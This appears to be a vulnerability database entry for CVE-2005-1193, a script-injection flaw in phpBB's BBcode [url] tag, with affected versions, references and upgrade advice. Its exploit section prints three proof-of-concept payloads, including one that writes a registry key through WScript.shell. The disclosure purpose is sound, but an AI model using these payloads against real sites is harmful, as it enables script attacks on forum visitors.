CVE-2005-1193
CVSS7.5
发布时间 :2005-05-16 00:00:00
修订时间 :2016-10-17 23:17:58
NMCOS    

[原文]The bbencode_second_pass and make_clickable functions in bbcode.php for phpBB before 2.0.15, as used in viewtopic.php, privmsg.php, and other scripts, allow remote attackers to execute arbitrary script via a BBcode tag with a (1) javascript:, (2) applet:, (3) about:, (4) activex:, (5) chrome:, or (6) script: URI scheme, as demonstrated using the URL tag.


[CNNVD]PHPBB URL Tag BBCode.PHP漏洞(CNNVD-200505-1069)

        phpBB的2.0.15之前版本的bbcode.php中的bbencode_second_pass和make_clickable函数,当用于viewtopic.php、privmsg.php和其他脚本时,允许远程攻击者通过一个带有(1)javascript:,(2)applet:,(3)about:,(4)activex:,(5)chrome:或(6)script: URI 模式的BBcode标签来执行任意脚本,如使用URL标签。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:phpbb_group:phpbb:2.0.12
cpe:/a:phpbb_group:phpbb:2.0.4
cpe:/a:phpbb_group:phpbb:2.0.11
cpe:/a:phpbb_group:phpbb:2.0.5
cpe:/a:phpbb_group:phpbb:2.0.10
cpe:/a:phpbb_group:phpbb:2.0.2
cpe:/a:phpbb_group:phpbb:2.0.3
cpe:/a:phpbb_group:phpbb:2.0.0
cpe:/a:phpbb_group:phpbb:2.0.1
cpe:/a:phpbb_group:phpbb:2.0_rc1
cpe:/a:phpbb_group:phpbb:2.0_rc2
cpe:/a:phpbb_group:phpbb:2.0.6d
cpe:/a:phpbb_group:phpbb:2.0_rc3
cpe:/a:phpbb_group:phpbb:2.0.6c
cpe:/a:phpbb_group:phpbb:2.0_rc4
cpe:/a:phpbb_group:phpbb:2.0.7a
cpe:/a:phpbb_group:phpbb:2.0.8a
cpe:/a:phpbb_group:phpbb:2.0_beta1
cpe:/a:phpbb_group:phpbb:2.0.8
cpe:/a:phpbb_group:phpbb:2.0.9
cpe:/a:phpbb_group:phpbb:2.0.14
cpe:/a:phpbb_group:phpbb:2.0.6
cpe:/a:phpbb_group:phpbb:2.0.13
cpe:/a:phpbb_group:phpbb:2.0.7

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1193
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-1193
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200505-1069
(官方数据源) CNNVD

- 其它链接及资源

http://castlecops.com/t123194-.html
(UNKNOWN)  MISC  http://castlecops.com/t123194-.html
http://marc.info/?l=full-disclosure&m=111552510000088&w=2
(UNKNOWN)  FULLDISC  20050508 phpbb 2.0.15 released - patches high critical vuln
http://seclists.org/lists/bugtraq/2005/May/0098.html
(UNKNOWN)  BUGTRAQ  20050507 phpbb 2.0.15 released - patches high critical vuln
http://securitytracker.com/id?1013918
(PATCH)  SECTRACK  1013918
http://securitytracker.com/id?1014117
(UNKNOWN)  SECTRACK  1014117
http://www.kb.cert.org/vuls/id/113196
(UNKNOWN)  CERT-VN  VU#113196
http://www.phpbb.com/phpBB/viewtopic.php?f=14&t=288194
(PATCH)  CONFIRM  http://www.phpbb.com/phpBB/viewtopic.php?f=14&t=288194
http://www.securityfocus.com/bid/13545
(PATCH)  BID  13545
http://xforce.iss.net/xforce/xfdb/20574
(UNKNOWN)  XF  phpbb-url-bbcode-file-include(20574)

- 漏洞信息

PHPBB URL Tag BBCode.PHP漏洞
高危 输入验证
2005-05-16 00:00:00 2005-10-20 00:00:00
远程  
        phpBB的2.0.15之前版本的bbcode.php中的bbencode_second_pass和make_clickable函数,当用于viewtopic.php、privmsg.php和其他脚本时,允许远程攻击者通过一个带有(1)javascript:,(2)applet:,(3)about:,(4)activex:,(5)chrome:或(6)script: URI 模式的BBcode标签来执行任意脚本,如使用URL标签。

- 公告与补丁

        目前厂商已经发布了升级补丁以修复这个安全问题,补丁下载链接:
        phpBB Group phpBB 2.0 RC1
        phpBB Group phpBB 2.0.15
        http://www.phpbb.com/downloads.php
        phpBB Group phpBB 2.0 RC3
        phpBB Group phpBB 2.0.15
        http://www.phpbb.com/downloads.php
        phpBB Group phpBB 2.0 RC4
        phpBB Group phpBB 2.0.15
        http://www.phpbb.com/downloads.php
        phpBB Group phpBB 2.0 Beta 1
        phpBB Group phpBB 2.0.15
        http://www.phpbb.com/downloads.php
        phpBB Group phpBB 2.0 RC2
        phpBB Group phpBB 2.0.15
        http://www.phpbb.com/downloads.php
        phpBB Group phpBB 2.0 .0
        phpBB Group phpBB 2.0.15
        http://www.phpbb.com/downloads.php
        phpBB Group phpBB 2.0.1
        phpBB Group phpBB 2.0.15
        http://www.phpbb.com/downloads.php
        phpBB Group phpBB 2.0.10
        phpBB Group phpBB 2.0.15
        http://www.phpbb.com/downloads.php
        phpBB Group phpBB 2.0.11
        phpBB Group phpBB 2.0.15
        http://www.phpbb.com/downloads.php
        phpBB Group phpBB 2.0.12
        phpBB Group phpBB 2.0.15
        http://www.phpbb.com/downloads.php
        phpBB Group phpBB 2.0.13
        phpBB Group phpBB 2.0.15
        http://www.phpbb.com/downloads.php
        phpBB Group phpBB 2.0.14
        phpBB Group phpBB 2.0.15
        http://www.phpbb.com/downloads.php
        phpBB Group phpBB 2.0.2
        phpBB Group phpBB 2.0.15
        http://www.phpbb.com/downloads.php
        phpBB Group phpBB 2.0.3
        phpBB Group phpBB 2.0.15
        http://www.phpbb.com/downloads.php
        phpBB Group phpBB 2.0.4
        phpBB Group phpBB 2.0.15
        http://www.phpbb.com/downloads.php
        phpBB Group phpBB 2.0.5
        phpBB Group phpBB 2.0.15
        http://www.phpbb.com/downloads.php
        phpBB Group phpBB 2.0.6
        phpBB Group phpBB 2.0.15
        http://www.phpbb.com/downloads.php
        phpBB Group phpBB 2.0.6 c
        phpBB Group phpBB 2.0.15
        http://www.phpbb.com/downloads.php
        phpBB Group phpBB 2.0.6 d
        phpBB Group phpBB 2.0.15
        http://www.phpbb.com/downloads.php
        phpBB Group phpBB 2.0.7
        phpBB Group phpBB 2.0.15
        http://www.phpbb.com/downloads.php
        phpBB Group phpBB 2.0.7 a
        phpBB Group phpBB 2.0.15
        http://www.phpbb.com/downloads.php
        phpBB Group phpBB 2.0.8 a
        phpBB Group phpBB 2.0.15
        http://www.phpbb.com/downloads.php
        phpBB Group phpBB 2.0.8
        phpBB Group phpBB 2.0.15
        http://www.phpbb.com/downloads.php
        phpBB Group phpBB 2.0.9
        phpBB Group phpBB 2.0.15
        http://www.phpbb.com/downloads.php
        

- 漏洞信息

16439
phpBB bbcode.php make_clickable() Function BBcode URL Arbitrary Script Execution
Remote / Network Access
Impact Unknown Upgrade
Vendor Verified

- 漏洞描述

Unknown or Incomplete

- 时间线

2005-05-09 Unknow
Unknow Unknow

- 解决方案

Upgrade to version 2.0.15 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

PHPBB URL Tag BBCode.PHP Vulnerability
Input Validation Error 13545
Yes No
2005-05-09 12:00:00 2009-07-12 02:06:00
Discovery of this issue is credited to Papados.

- 受影响的程序版本

phpBB Group phpBB 2.0.14
phpBB Group phpBB 2.0.13
+ Debian Linux 3.1 sparc
+ Debian Linux 3.1 s/390
+ Debian Linux 3.1 ppc
+ Debian Linux 3.1 mipsel
+ Debian Linux 3.1 mips
+ Debian Linux 3.1 m68k
+ Debian Linux 3.1 ia-64
+ Debian Linux 3.1 ia-32
+ Debian Linux 3.1 hppa
+ Debian Linux 3.1 arm
+ Debian Linux 3.1 alpha
+ Debian Linux 3.1
phpBB Group phpBB 2.0.12
phpBB Group phpBB 2.0.11
phpBB Group phpBB 2.0.10
phpBB Group phpBB 2.0.9
phpBB Group phpBB 2.0.8 a
phpBB Group phpBB 2.0.8
phpBB Group phpBB 2.0.7 a
phpBB Group phpBB 2.0.7
phpBB Group phpBB 2.0.6 d
phpBB Group phpBB 2.0.6 c
phpBB Group phpBB 2.0.6
phpBB Group phpBB 2.0.5
phpBB Group phpBB 2.0.4
phpBB Group phpBB 2.0.3
phpBB Group phpBB 2.0.2
phpBB Group phpBB 2.0.1
phpBB Group phpBB 2.0 .0
phpBB Group phpBB 2.0 RC4
- Apache Software Foundation Apache 1.3.9
- Apache Software Foundation Apache 1.3.9
phpBB Group phpBB 2.0 RC3
- Apache Software Foundation Apache 1.3.9
- Apache Software Foundation Apache 1.3.9
phpBB Group phpBB 2.0 RC2
- Apache Software Foundation Apache 1.3.9
- Apache Software Foundation Apache 1.3.9
phpBB Group phpBB 2.0 RC1
- Apache Software Foundation Apache 1.3.9
- Apache Software Foundation Apache 1.3.9
phpBB Group phpBB 2.0 Beta 1
- Apache Software Foundation Apache 1.3.9
- Apache Software Foundation Apache 1.3.9
phpBB Group phpBB 2.0.15

- 不受影响的程序版本

phpBB Group phpBB 2.0.15

- 漏洞讨论

The phpbb vendor reports that a critical vulnerability exists in the BBCode handling routines of the 'bbcode.php' script.

The bbcode [url] tag is not properly sanitized of user-supplied input. This could permit the injection of arbitrary HTML or script code into the browser of an unsuspecting user in the context of the affected site.

- 漏洞利用

An exploit is not required.

The following proof of concepts are available:
[url=javascript://%0ASh=alert(%22CouCou%22);window.close();]Alert box with "CouCou"[/url]

[url=javascript://%0ASh=new%20ActiveXObject(%22WScript.shell%22);Sh.regwrite(%22HKCU%5C%5CQQQQQ%5C%5Cqq%22,%22CouCou%22)
;window.close();]Create registry entry: HKCU\QQQQQ\qq = "CouCou"[/url]

[url=javascript://%0Awindow.opener.document.body.innerHTML=window.opener.document.body.innerHTML.replace(%27Hi%20Paul%27
,%27Hi%20P.A.U.L%27);window.close();]Modify opener page: Paul -> P.A.U.L[/url]

- 解决方案

The vendor has released version 2.0.15 to address this issue.


phpBB Group phpBB 2.0 RC1

phpBB Group phpBB 2.0 RC3

phpBB Group phpBB 2.0 RC4

phpBB Group phpBB 2.0 Beta 1

phpBB Group phpBB 2.0 RC2

phpBB Group phpBB 2.0 .0

phpBB Group phpBB 2.0.1

phpBB Group phpBB 2.0.10

phpBB Group phpBB 2.0.11

phpBB Group phpBB 2.0.12

phpBB Group phpBB 2.0.13

phpBB Group phpBB 2.0.14

phpBB Group phpBB 2.0.2

phpBB Group phpBB 2.0.3

phpBB Group phpBB 2.0.4

phpBB Group phpBB 2.0.5

phpBB Group phpBB 2.0.6

phpBB Group phpBB 2.0.6 c

phpBB Group phpBB 2.0.6 d

phpBB Group phpBB 2.0.7

phpBB Group phpBB 2.0.7 a

phpBB Group phpBB 2.0.8 a

phpBB Group phpBB 2.0.8

phpBB Group phpBB 2.0.9

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站